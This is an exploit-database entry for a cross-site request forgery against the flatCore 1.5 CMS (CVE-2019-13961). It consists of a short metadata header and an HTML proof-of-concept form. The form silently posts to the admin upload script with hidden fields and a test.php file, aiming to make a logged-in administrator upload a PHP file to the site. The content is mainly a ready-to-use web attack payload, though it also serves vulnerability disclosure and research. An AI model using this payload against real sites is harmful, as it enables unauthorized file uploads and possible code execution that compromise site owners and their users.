# Exploit Title: flatCore 1.5 - Cross Site Request Forgery (CSRF)
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/flatCore/flatCore-CMS
# Software Link: https://github.com/flatCore/flatCore-CMS
# Version: d3a5168
# Tested on: Ubuntu Windows
# CVE : CVE-2019-13961

PoC:
<!DOCTYPE html>
<html>
<head>
    <title>CSRF PoC</title>
</head>
<body>
    <form action="http://flatcore3/acp/core/files.upload-script.php" method="POST" enctype="multipart/form-data">
        <input type="hidden" name="upload_destination" value="../content/files">
        <input type="hidden" name="w" value="800">
        <input type="hidden" name="h" value="600">
        <input type="hidden" name="fz" value="1000">
        <input type="hidden" name="unchanged" value="yes">
        <input type="file" name="file" value="test.php">
        <input type="submit" value="Upload">
    </form>
</body>
</html>


[Replace Your Domain Name]